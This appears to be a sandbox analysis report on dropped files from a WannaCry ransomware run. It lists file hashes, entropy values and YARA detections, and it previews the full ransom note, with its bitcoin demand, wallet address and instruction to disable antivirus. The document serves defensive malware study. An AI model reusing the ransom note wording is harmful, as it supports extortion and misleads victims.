                                                  MD5:36F5BA162D2F0EDE876ABDC8BD4369D6
                                                  SHA1:CFEAC9D157D2AE96D846851528C0FB8E46ABB2A6
                                                  SHA-256:69C46A69A5E101B7B54DF2751F4E0E3BEE5748C0EE4AF5A74EA4A78243DEE25A
                                                  SHA-512:FADF9D3DEE2631DC286359A209C63C6826ABB012278C385C279265511C2E660D23920C2CFAB9ACCCB8EE7C574B1202FA204807AA826CBF8F5328A52D0AFCC31F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.877518914137892
                                                  Encrypted:false
                                                  SSDEEP:24:bkPn/GjbjQHeW1jXyIFzS32iGIdnHSIkqZTsQA6jyW6AxmXW650:bkPnupW1jCIFzSGItyIjZwQVF6AxW0
                                                  MD5:36F5BA162D2F0EDE876ABDC8BD4369D6
                                                  SHA1:CFEAC9D157D2AE96D846851528C0FB8E46ABB2A6
                                                  SHA-256:69C46A69A5E101B7B54DF2751F4E0E3BEE5748C0EE4AF5A74EA4A78243DEE25A
                                                  SHA-512:FADF9D3DEE2631DC286359A209C63C6826ABB012278C385C279265511C2E660D23920C2CFAB9ACCCB8EE7C574B1202FA204807AA826CBF8F5328A52D0AFCC31F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827279835381131
                                                  Encrypted:false
                                                  SSDEEP:24:CSD5ouH3AGSjN79UQV/XgUBPif6V/e4bNZ9KIbr1+imLp:CYH3tM9p/QmPoh4hZPJml
                                                  MD5:ADE09F57ADE0A92EDFE626F98208C440
                                                  SHA1:BA547705FFEEC6B8D176ED8B1D119BD7349E921C
                                                  SHA-256:798E1AEC3C39211C8F2C70547C305C6E10108A7A7C7782612E1C475C92B98D3A
                                                  SHA-512:49A62E9585C2668B0A13040C2E6356CAFA29BDA9F98033766F86134019D1E67001A7465BAABDE433CCB00FE0D86579360B072C38593BC18573E23FFE9D7C36B0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833024310109551
                                                  Encrypted:false
                                                  SSDEEP:24:bkP6VwNGhqPyivdJ1xpRnWUdpznrc2VRTJattQBVrAhTNWlmMoVCzAkS6NY6/6B:bkyVtqPyi1J1nRntrJVJJazQnrZEMoAy
                                                  MD5:639180ADD49631302406806D51868FF2
                                                  SHA1:F6F7E5C518890CA8A9BFC27A06BFA885D996F2D8
                                                  SHA-256:31598B014E57B780E4DB550ED65ED7A0AE1208BD9D4071EBFA33C97CF7F905D8
                                                  SHA-512:CE1E1E252EE2541029DCD031671126FB7F6D2A00E52B5C8F3156F6B06A20FE6AC7739777E9772BC304CBFBF623E2FC723228DE4CCD3B87E3DAC6186A067715DA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833024310109551
                                                  Encrypted:false
                                                  SSDEEP:24:bkP6VwNGhqPyivdJ1xpRnWUdpznrc2VRTJattQBVrAhTNWlmMoVCzAkS6NY6/6B:bkyVtqPyi1J1nRntrJVJJazQnrZEMoAy
                                                  MD5:639180ADD49631302406806D51868FF2
                                                  SHA1:F6F7E5C518890CA8A9BFC27A06BFA885D996F2D8
                                                  SHA-256:31598B014E57B780E4DB550ED65ED7A0AE1208BD9D4071EBFA33C97CF7F905D8
                                                  SHA-512:CE1E1E252EE2541029DCD031671126FB7F6D2A00E52B5C8F3156F6B06A20FE6AC7739777E9772BC304CBFBF623E2FC723228DE4CCD3B87E3DAC6186A067715DA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817605082713292
                                                  Encrypted:false
                                                  SSDEEP:24:xzvtkgYX+wiIJbG6qKt5tQlRVJS6iv5th/WuBLHvDrCh:ltZYX9NJKs5tQlJgv5OYLPDrC
                                                  MD5:F94BD89856E27CBBBF1DDCC317404C20
                                                  SHA1:7A93781DF0A0EEF593F2133A67501D3B8B6E129D
                                                  SHA-256:126E54C6D209DD003123DD62EDF4236C98C9F39D3C459FED68FD32ACE4D1C30F
                                                  SHA-512:C96035E03B44E67B29E3874AD356966C82370814884757BFC0A1A713355F38C381E3307B12EF1BC0160F8E00428CF750B90A9765A63E9EDCE6625339B7DBFE84
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854848930161475
                                                  Encrypted:false
                                                  SSDEEP:24:bk1W2Ur3QI/JmfWAzjBwlL1tQeSyRSNytV9seDUmjKET8/5GurA2LGmVNp/iNVEQ:bkxWJgpjy1tfSN+smUm+BrzLHp/iIjHI
                                                  MD5:8B452A8492494C521EDA704403B3CF4C
                                                  SHA1:2FAEA10F0005DF65429F8D19570063CAB10D3559
                                                  SHA-256:AFC65454F5B52794F41F9A4A2DD6162BE83D9E8B78E2B2FBC2502C83DC8E65A9
                                                  SHA-512:1D85E00F2BEF35C43ABF5E7B6162AE31E0259E326004306478D7A86851D6D05B9055630BD78CC66B2FAFAFEBADAEA05BDEF7B613D8D53C2845188BB7BD85B491
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854848930161475
                                                  Encrypted:false
                                                  SSDEEP:24:bk1W2Ur3QI/JmfWAzjBwlL1tQeSyRSNytV9seDUmjKET8/5GurA2LGmVNp/iNVEQ:bkxWJgpjy1tfSN+smUm+BrzLHp/iIjHI
                                                  MD5:8B452A8492494C521EDA704403B3CF4C
                                                  SHA1:2FAEA10F0005DF65429F8D19570063CAB10D3559
                                                  SHA-256:AFC65454F5B52794F41F9A4A2DD6162BE83D9E8B78E2B2FBC2502C83DC8E65A9
                                                  SHA-512:1D85E00F2BEF35C43ABF5E7B6162AE31E0259E326004306478D7A86851D6D05B9055630BD78CC66B2FAFAFEBADAEA05BDEF7B613D8D53C2845188BB7BD85B491
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803014480113174
                                                  Encrypted:false
                                                  SSDEEP:24:BK5mPTbhtiACDzIWISa9AqT0M9e42DOvvXBLKCxssQDHMQJGNs1tZPDR:BxbeACV+r0M9aDOvvXg2srrqs1PDR
                                                  MD5:349859A88A857CFEB5FA48B327DA598E
                                                  SHA1:B7245ED8862C33448A8489C0FA7C45F9FCE41554
                                                  SHA-256:C6C6791EF6689A9EB59CD1CD183469AF4F7CDEB6A01C450F0F9968A67D4F0932
                                                  SHA-512:F0C0F09675339DDC2EC6E36EA59F8B101E43211AAF6B1F861A446D4C80B6B8A081034F6B798B6BCA4B89B3D42E247ED4106BA6EB310BAA960D55B776CA0B0893
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848988950255822
                                                  Encrypted:false
                                                  SSDEEP:24:bkNFo8YVVA5V4xhbLc/tDSuUcx9Y/cZ655f5nAunyqkIBu:bknKVV2Vsc/BQcfYUZ+5f7yqju
                                                  MD5:192993AE5377F06890B3BC1050167EBD
                                                  SHA1:AF0F05538B2AA90EF4BAFBFC04EB49920E07DA03
                                                  SHA-256:519D6EF2D3DA783D83310E539D48B0B1548745B49A794249EB090219FA5359B5
                                                  SHA-512:AC08046E805ED82923F942DD5FB87080EE7DFAAE07B5EE7A35C018A7554D8F44A35F3125110093B84BDFCC9E617D351C4FCB4C2A49F4C3B9BA128A50B315DA7E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848988950255822
                                                  Encrypted:false
                                                  SSDEEP:24:bkNFo8YVVA5V4xhbLc/tDSuUcx9Y/cZ655f5nAunyqkIBu:bknKVV2Vsc/BQcfYUZ+5f7yqju
                                                  MD5:192993AE5377F06890B3BC1050167EBD
                                                  SHA1:AF0F05538B2AA90EF4BAFBFC04EB49920E07DA03
                                                  SHA-256:519D6EF2D3DA783D83310E539D48B0B1548745B49A794249EB090219FA5359B5
                                                  SHA-512:AC08046E805ED82923F942DD5FB87080EE7DFAAE07B5EE7A35C018A7554D8F44A35F3125110093B84BDFCC9E617D351C4FCB4C2A49F4C3B9BA128A50B315DA7E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813197753571645
                                                  Encrypted:false
                                                  SSDEEP:24:BzB8zp47kWFOTLz3yiVhUQ04AiDqMgvvHJuRU/4DHtsQiGdLdJ:Bd8zp47wTLbyiVuQkiDqMYH8RUwpsGN
                                                  MD5:E7052018C1BE7B7677F78ADE82211F90
                                                  SHA1:09EF9694FFA1F1DDC0F0282BEB99DE007DA1B8A5
                                                  SHA-256:25BFD3CCD1DFF80E4F2A602F5B71E9B173F42791655629179E4C6F842CEC44F5
                                                  SHA-512:ECA28F7D61C5E7FAF470678F987232B9D9548E68C9383203CF2591922D46634AF8187B844B9F0F23A28961EB8E74DBDF65CB2D0ED97FB6DB967507187C4B2EEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.824841768754727
                                                  Encrypted:false
                                                  SSDEEP:24:bkVmGSkgHwjW83xTwfqQcRiKdnTPO0O5gJLuUDncT2NZ9CyBJ6JuV4i05800Xrrn:bkVcwjW8BTAcAKdnDO0OaLFcTU3u6h0a
                                                  MD5:F2F3F5FAFDDA4C648C472F2B2947E4D6
                                                  SHA1:145AFC4AD195584B541A4E8BC48DD987ED63403E
                                                  SHA-256:BBC6081C97635B0A76168251518E7753E3D857B8CC05FCA8184F05D33154EEF6
                                                  SHA-512:AAED33AA266D208B1AA04E9400C26D9C20969E9B6DC68C8D631B6CC0FA96424A5DD8FF7322DF498015BDA6959D1968D884202F1EC6E9E72D6AC9B4953943619D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3197106
                                                  Entropy (8bit):6.130063064844696
                                                  Encrypted:false
                                                  SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                                  MD5:6ED47014C3BB259874D673FB3EAEDC85
                                                  SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                                  SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                                  SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):719217
                                                  Entropy (8bit):5.981438230537172
                                                  Encrypted:false
                                                  SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                                  MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                                  SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                                  SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                                  SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):417759
                                                  Entropy (8bit):5.853358941151938
                                                  Encrypted:false
                                                  SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                                  MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                                  SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                                  SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                                  SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):411369
                                                  Entropy (8bit):5.909395689751269
                                                  Encrypted:false
                                                  SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                                  MD5:6D6602388AB232CA9E8633462E683739
                                                  SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                                  SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                                  SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):523262
                                                  Entropy (8bit):5.7796587531390795
                                                  Encrypted:false
                                                  SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                                  MD5:73D4823075762EE2837950726BAA2AF9
                                                  SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                                  SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                                  SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):92599
                                                  Entropy (8bit):5.351249974009154
                                                  Encrypted:false
                                                  SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                                  MD5:78581E243E2B41B17452DA8D0B5B2A48
                                                  SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                                  SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                                  SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):711459
                                                  Entropy (8bit):5.884120014912355
                                                  Encrypted:false
                                                  SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
                                                  MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                                  SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                                  SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                                  SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3098624
                                                  Entropy (8bit):6.512654975680739
                                                  Encrypted:false
                                                  SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                  MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                  SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                  SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                  SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):107520
                                                  Entropy (8bit):6.440165833134522
                                                  Encrypted:false
                                                  SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                                  MD5:FB072E9F69AFDB57179F59B512F828A4
                                                  SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                                  SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                                  SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Windows\System32\cmd.exe
                                                  File Type:PEM certificate
                                                  Category:dropped
                                                  Size (bytes):33755
                                                  Entropy (8bit):5.201671057656061
                                                  Encrypted:false
                                                  SSDEEP:768:9M2kjfGNe5JJ0Qpruz9hGFDp2yONFntn/kH:jaMyJ/pruz9YLKu
                                                  MD5:6B462CCA3BA672D680A227C3BA02B555
                                                  SHA1:612C4F426F4164E719C39D1788220268935649FA
                                                  SHA-256:1B1063969DA8D3A22AC2D7BD06DDDE9EEAAD2C2EDF9598BF6090F8FD59DE9B61
                                                  SHA-512:D92CFEF7B956322AAA84A872EDCFE68D9607ECEDE459A6F646DA7F69C13A48FCDF65886AEB238BA2F61591090570F4E6130BA44138639369C530850C95A5CA2D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: SUSP_certificate_payload, Description: Detects payloads that pretend to be certificates, Source: C:\Users\user\Desktop\WANNACRY.bin, Author: Didier Stevens, Florian Roth
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6223568
                                                  Entropy (8bit):7.999269544491864
                                                  Encrypted:true
                                                  SSDEEP:98304:rJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyk:t
                                                  MD5:8185E422B95FD15C2E069EE8C92C1914
                                                  SHA1:C5CEADE352DDBC353C49CDF9963DB634A1B6DF51
                                                  SHA-256:E44CE2AE7E255DBDFE9B4CA81DDA46DAF65194414D095A9AD6F79026B4A51307
                                                  SHA-512:5469F0ABB3E13867067190FE33D45FB14A54A08DA206C0D0FCFB0519B8F0CE11AEE31DD945981D6DF9388D3449A487A7D2902A740D53603B894D565651CEC20D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6223848
                                                  Entropy (8bit):7.9999697024458065
                                                  Encrypted:true
                                                  SSDEEP:98304:r4f1OoM8yU0PwRSTJCkS8fbZPIgxnEA0JnCDZvq6E7Io+gLLf9bkdGeiLB+:8fJM8y5iSTJZ1PIenEA0ZAvqV0oTLVb2
                                                  MD5:5EB56BFAB83A034484159FA646B9F9D7
                                                  SHA1:C8AAFA07ACF9810A214E7960248BEF1EC6A04032
                                                  SHA-256:6B00D6AE6AD2EA5B9B8BB05A3029D17C0CD4222A811FC9E83993D3C46437ABED
                                                  SHA-512:875E0B5E4E883C59E525F47251EF065084EEB454BCAED285F3BBC0A56492EAD2FB0332E59CE7CEB939465AE337BF0766E75C5A9E581259E249E6B5557057AB9A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Windows\System32\certutil.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3514368
                                                  Entropy (8bit):7.995470941164686
                                                  Encrypted:true
                                                  SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                  MD5:84C82835A5D21BBCF75A61706D8AB549
                                                  SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                  SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                  SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: ReversingLabs
                                                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: us-cert code analysis team
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 94%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80440826011533
                                                  Encrypted:false
                                                  SSDEEP:24:A+3kiKL/6QBiSYV1FKPqatxul8dfLaqAAbfnW/xp2GgH:A+0//6Liq/mdGgbfnW/x4
                                                  MD5:12EA2208D6C0B8FF88A3DAEEDB6664EC
                                                  SHA1:0BD3BAA4B5D07CC9C6FE03AB03578C6CED7C675C
                                                  SHA-256:30E40311A5DA56B950E9B1AACD3E80D65DC8FAB3F5F0532E182234C19CFC8D0C
                                                  SHA-512:49204C016A91E16273D67DEE37F5AA3AD20E6B09A8937D57239CE6E93ED471F3C6A66A9CD10BA514064F47B14357478A8867073DEC88A042CF78F55DBFB46676
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.836125606795506
                                                  Encrypted:false
                                                  SSDEEP:24:bkWHaIFSX9XCPOPd3SRU98U98Y3k+4G1CPPY5xvPehyP0nUGV7xzPQHOzhryXFI8:bk9sSXbF3SRUb98Y3hqgNPGi0DV7hAOq
                                                  MD5:C650F1176A21E75BCF6E1FF968905BA0
                                                  SHA1:ED537ED83A083F987DC532B68374BE6B7FF9A7B4
                                                  SHA-256:703FB662B319B55CA2CE8F7DA63858632DD62255377FAC8E62392B8BD5C94CBD
                                                  SHA-512:166B28072270B22E8557DD5A5777864DA70E59A64D5A0C4CA27E38005A73F07C69DDD2003E468450512E4158AAEB93D8AAFEE15EBAF630C2DDF10DEAC8BD13B6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805428173096447
                                                  Encrypted:false
                                                  SSDEEP:24:QmGYGywT47l5zenulYUDGRpq1FDApRj1Br8jqy:QdhywYakGRWF0f1mjt
                                                  MD5:A6380DB5FBCDAE0BD6936F3FE846F45A
                                                  SHA1:49ACEEB0D348BE85272692EE54453CF2430DF1E7
                                                  SHA-256:CD84DCC255564CAE182304573309C2D5AB7F6313B82FC87FA8D713F05F500E5E
                                                  SHA-512:28D689A53A54DB40AB90EF31988D6079781D2029CC1D349D273EB82B578C4F1F54AEDBFE4FB77D6815563AF6C5C058B11936E94C6AD2B473AA61C1CEB4FBF4CB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842491723541216
                                                  Encrypted:false
                                                  SSDEEP:24:bkwHT5MFhVyDUwkd21pywojLn5wRHmf8eGiB5NwmWv+5g7GEwNtgPbnshnJOEe:bkwMyDUwW2WwWLC4f8UHam15UGEwmae
                                                  MD5:C28A402F4DD6085940848637E61D85FF
                                                  SHA1:6A064995E7F83A46749A3E85AD0B30DEDC11D1BC
                                                  SHA-256:19733DE0BC183A0F773E0E3CFCCF06EE3DD534FADC085821080632F11D3E4BD7
                                                  SHA-512:813B5CCFF43B109EC915FA587680BA9397764F91BE4255F230EC763880AC06E21A64DB85EFC29D871BAE0FC056FB6D0283D2BB19F7A4FB2D87F376EC637DCBC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
